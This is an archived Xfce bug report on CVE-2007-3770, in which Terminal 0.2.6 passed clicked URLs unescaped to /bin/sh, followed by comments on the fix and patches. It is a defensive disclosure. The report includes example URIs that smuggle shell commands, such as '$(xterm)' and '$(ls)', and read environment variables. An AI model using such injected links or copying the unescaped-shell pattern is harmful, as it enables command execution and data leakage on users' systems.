! Please note that this is a snapshot of our old Bugzilla server, which is read only since May 29, 2020. Please go to gitlab.xfce.org for our new server !
Terminal-0.2.6, URL handling allows remote shell command execution
Status:
CLOSED: FIXED
Product:
Xfce4-terminal
Component:
General

Comments

Description Samuli Suominen 2007-07-10 20:24:17 CEST
Reported security issue with Terminal-0.2.6.

<quote>

Clicking "Open Link" on a malicious link may leak information or allow remote
shell command execution because Xfce Terminal uses /bin/sh -c with
gdk_spawn_on_screen for running the browser, with no proper escaping in the
URI. A recommended fix would be to use the execvp(2) series functions with no
shell.

Example URIs:
http://foo.bar/$(xterm)/ - remote command execution
http://google.com/search?q=$(ls)&sourceid=b0rk - used for stealing information
http://google.com/search?q=$HOME - examine environment

The behavior of these may vary depending on the browser chosen. I can verify
the current results on two computers with the default setting "Mozilla Firefox"
chosen, using Terminal-0.2.6.

</quote>
Comment 1 Benedikt Meurer editbugs 2007-07-20 16:55:44 CEST
Fixed with revision 25929.

2007-07-20	Benedikt Meurer <benny@xfce.org>

	* helpers/, icons/, terminal/, Makefile.am, NEWS, Terminal.ui,
	  configure.in.in, doc/: Drop the preferred application handling
	  from Terminal and use the Xfce preferred application directly.
	  This fixes a security issue, where the URL handling allowed
	  for remote shell command execution, because the helper scripts
	  were run via the shell (Bug #3383).
Comment 2 Yves-Alexis Perez editbugs 2007-07-21 10:30:18 CEST
Will there be a patch fixing this bug against stable version 0.2.6?

Regards,

--
Yves-Alexis Perez
Comment 3 Benedikt Meurer editbugs 2007-07-21 19:09:30 CEST
Hm, that was quite a large change. Wouldn't make sense to backport it (you could use the current svn, not that different from 0.2.6).

If you don't want to use an svn version, you can try a quickfix: In terminal-helper.c, function terminal_helper_execute, g_shell_quote() the uri prior to inserting it into the command string. That should be enough to avoid the security issue.
Comment 4 Samuli Suominen 2007-07-21 20:10:44 CEST
We went with snapshot of current svn, but a released tarball would be nice. 0.2.6.1, 0.2.7..
Comment 5 Darren Salt 2007-08-12 16:18:16 CEST
Created attachment 1309 
Fix for 0.2.6
Comment 6 Eren Türkay 2007-08-12 16:55:24 CEST
With this patch, command execution is fixed but ENV veriables can still be reached via clicking URL. Just write it to Terminal and click;

www.foobar.com/$HOME
Comment 7 Eren Türkay 2007-08-14 06:34:45 CEST
Created attachment 1311 
Full Patch for CVE-2007-3770

Here is a full patch, even ENV veriables can't be reached.

Bug #3383

Reported by:
Samuli Suominen
Reported on: 2007-07-10
Last modified on: 2009-12-17

People

Assignee:
Benedikt Meurer
CC List:
3 users

Version

Attachments

Fix for 0.2.6 (6.56 KB, patch)
2007-08-12 16:18 CEST , Darren Salt
no flags
Full Patch for CVE-2007-3770 (9.83 KB, patch)
2007-08-14 06:34 CEST , Eren Türkay
no flags

Additional information